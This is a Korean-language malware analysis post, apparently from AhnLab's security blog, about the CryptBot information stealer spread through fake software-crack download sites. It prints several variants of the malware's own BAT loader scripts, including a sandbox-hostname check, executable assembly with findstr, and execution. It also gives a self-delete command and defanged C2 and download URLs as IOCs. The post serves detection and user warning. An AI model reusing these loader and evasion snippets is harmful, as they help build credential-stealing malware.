지속적으로 변형되며 유포 중인 CryptBot 정보탈취 악성코드

CryptBot 악성코드는 S/W 다운로드 페이지를 위장한 악성 사이트에서 유포 중인 정보탈취 유형의 악성코드이다. 다수의 악성 사이트가 개설되어 있으며, 유명 상용 소프트웨어의 Crack, Serial 등의 키워드 검색 시 검색 결과 상위에 다수 노출되기 때문에 많은 사용자가 해당 악성코드를 다운로드하여 실행한다. 또한 해당 샘플은 SFX 방식의 패킹을 사용하기 때문에 정상과 악성의 구분이 쉽지 않은 편이며, 하루에도 몇 번씩 잦은 변형이 발생한다.

다운로드 페이지로 위장하였기 때문에 사용자는 정상 파일로 오인하여 V3 제품에서 차단이 발생하여도 지속적으로 여러 번 실행하는 패턴을 보이는데, 사용자의 주의가 필요하다. 안랩에서는 해당 악성코드의 위험성을 알리기 위해 관련 정보를 지속적으로 블로그에 게시한 바 있다.

그림 1. CryptBot 악성코드 유포 사이트 예시

해당 악성코드는 다음과 같이 여러 겹으로 압축 되어있는 구조이다. 특히 최종 압축 파일은 패스워드가 적용되어 있으며 동봉된 txt 파일에 패스워드가 명시되어있다.

그림 2. 악성 사이트에서 다운로드한 압축 파일

악성코드 실행 시 %temp% 경로에 7z.SFX.xxx, IXPxxx.TMP 등의 이름의 폴더를 생성 후 해당 폴더에 감염에 필요한 파일들을 생성한다. 이때 파일명과 확장자명은 매 변형마다 변경된다. 생성하는 파일은 다음과 같다.

그림 3. 드롭 파일
  • BAT 스크립트 (Far.vsdx)
  • Autoit 스크립트 (Impedire.vsdx)
  • 암호화된 CryptBot 바이너리 (Vento.vsdx)
  • Autoit 실행파일 (Copre.vsdx)

파일 생성 후 BAT 스크립트를 실행하는데 해당 스크립트의 구조는 다음과 같다.

그림 4. BAT 스크립트

해당 BAT 스크립트는 주기적으로 변형이 이루어지는 특징을 보인다. 변형이 쉽다는 스크립트의 특징을 이용하여 기능은 유지한 채 문법만을 조금씩 수정하며 변형하는 패턴을 보인다. 다음 표는 최근 약 한 달간 수집된 CryptBot 샘플의 BAT 스크립트 변형 발생 일자이다. 점점 변형 주기가 더욱 빨라진 것을 확인할 수 있다.

Confronto.jar 2021-06-16
Aprile.accdr 2021-07-06
Virtuoso.bmp 2021-07-16
Orti.html 2021-07-17
Pensai.wmz 2021-07-21
Lume.eml 2021-07-22
Ritroverai.aiff 2021-07-23
Povera.ppsm 2021-07-24
Ideale.dotx 2021-07-25
Affonda.wms 2021-07-26
Esaltavano.tiff 2021-07-28
표 1. 변형 발생일

대표적인 변형을 살펴보면 다음 표와 같다. BAT 스크립트의 기능 자체는 변함이 없지만 문법이나 사용하는 환경 변수등이 조금씩 변형되는 것을 확인할 수 있다.

Aprile.accdr
if %userdomain%==DESKTOP-QO5QU33 exit 2
<nul set /p = “MZ”> Ripreso.exe.com
findstr /V /R “^AGbW…xiSv$” Fianco.accdr >> Ripreso.exe.com”
copy Fra.accdr B
start Ripreso.exe.com B
ping 127.0.0.1 -n 30
Virtuoso.bmp
Set PRehIgqfWNWhFAxNgjgzQhcGBgikLpocQQTp=DESKTOP-
Set zVqJPft=QO5QU33
Set bizASaCEemlwdhJhU=MZ

if %userdomain%==%PRehIgqfWNWhFAxNgjgzQhcGBgikLpocQQTp% exit 8
<nul set /p = “%bizASaCEemlwdhJhU%“> Compatto.exe.com
findstr /V /R “^viIO…hWwHg$” Baciandola.bmp >> Compatto.exe.com”
copy Corano.bmp w
start Compatto.exe.com w
ping 127.0.0.1 -n 30
Lume.eml
echo XrHAkUeB
echo XrHAkUeB

if %userdomain%==DESKTOP-QO5QU33 exit 2
<nul set /p = “MZ”> Mese.exe.com
findstr /V /R “^VtHMWSo…DuPlDDuA$” Giorni.eml >> Mese.exe.com”
copy Scossa.eml h
start Mese.exe.com h
ping 127.0.0.1 -n 30
Esaltavano.tiff
Set PaWlwDiebzBsRrpYjIjVHC=DESKTOP-
Set hQfTrWvlasdWKZ=QO5QU33
if %computername%==%PaWlwDiebzBsRrpYjIjVHC% exit
Set OzhMvyIxp=MZ
<nul set /p = “%OzhMvyIxp%” > Hai.exe.com
findstr /V /R “^fqCO…pHiJlm$” Affettuosa.tiff >> Hai.exe.com”
copy Saluta.tiff S
start Hai.exe.com S
ping localhost -n 30
표 2. 변형 내용

BAT 스크립트는 실행 시 Autoit 실행파일을 [랜덤].exe.com 파일명으로 복사한다. 이후 Autoit 스크립트를 특정 파일명으로 복사 후 인자로 주어 해당 파일을 실행한다.

그림 5. 실행된 Autoit 프로세스

Autoit 스크립트는 암호화된 바이너리를 복호화하여 가상메모리 영역에 복사 후 실행한다.

그림 6. 복호화된 CryptBot 악성코드 바이너리

메모리에 로드된 CrpytBot 바이너리 실행 시 특정 AV 제품 디렉토리를 검사한다. 해당 디렉토리가 존재할 경우 랜덤한 수를 생성하여 그 수만큼 Sleep 한다. 탐지 회피를 위한 실행 지연으로 추정된다.

그림 7. AV 제품 디렉터리 검사 코드

특정 디렉토리의 존재 유무를 검사한다. 이미 해당 디렉토리가 존재한다면 중복 실행 혹은 이미 감염된 시스템으로 판단하여 종료 후 자가 삭제 행위를 한다. 해당 디렉토리명은 샘플마다 다르다.

그림 8. 중복 실행 검사

자가삭제 시 다음과 같은 CMD 명령어를 ShellExecuteW 함수를 통해 실행한다.

/c rd /s /q %Temp%\[생성디렉토리명] & timeout 2 & del /f /q “[악성코드 실행 경로]”
표 3. 자가삭제 명령어

본격적으로 악성행위를 시작하면 %TEMP% 경로에 랜덤 디렉터리를 생성후 각종 사용자 정보 수집을 시작한다. 본 샘플에 의해 수집되는 정보는 다음과 같다.

  • 브라우저 정보 (Chrome, Firefox, Opera)
    • 쿠키
    • 저장 폼 데이터
    • 저장 계정명/패스워드
  • 암호화폐 지갑 정보
  • 시스템 정보
    • 실행 샘플명
    • OS 및 국가 정보
    • 사용자 계정, PC 이름
    • 하드웨어 정보
    • 설치된 프로그램 목록
    • 스크린샷
그림 9. 브라우저 저장 계정 및 패스워드 수집 데이터
그림 10. 시스템 정보 수집 데이터

정보 수집이 완료되면 생성한 디렉토리 전체를 암호화 ZIP 압축하여 C2로 전송한다. C2 주소는 .top 도메인을 사용하는 것이 특징이며 자주 변경된다. 통상적으로 CrtyptBot 악성코드 샘플 하나 당 정보 전송용 C2 두 개, 추가 악성코드 다운로드용 C2 한 개가 존재한다.

그림 11. C2 전송 코드

C2 전송 작업을 완료하면 특정 URL에 접속하여 추가 악성 코드를 다운로드한 후 실행한다. 주로 ClipBanker 류의 악성코드를 다운받는 것으로 확인된다.

그림 12. 추가 악성코드 다운로드 및 실행 코드

본 악성코드에 감염되면 계정명과 패스워드, 암호화폐 지갑 등의 중요 정보가 유출된다. 유출된 정보를 악용하여 2차적인 피해가 발생할 가능성이 높기 때문에 주의해야 한다.

한편 안랩 V3 제품군에서는 해당 악성코드를 다음과 같은 진단명으로 진단 중이다.

Trojan/Win.CryptLoader.XM122
Trojan/Win.CryptLoader.XM126
Trojan/BAT.CryptLoader.S1612
Trojan/BAT.CryptLoader.S1610
Win-Trojan/MalPeP.mexp

[IOC 정보]

c2bc3bef415ae0ed2e89cb864fff2bfc
58774ece556b0a1e01443ea1c3c68e5a

ewais32[.]top/index.php
morxeg03[.]top/index.php
winxob04[.]top/download.php?file=lv.exe

smaxgr31[.]top/index.php
morers03[.]top/index.php
gurswj04[.]top/download.php?file=lv.exe


연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.



Categories:악성코드 정보

5 3 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments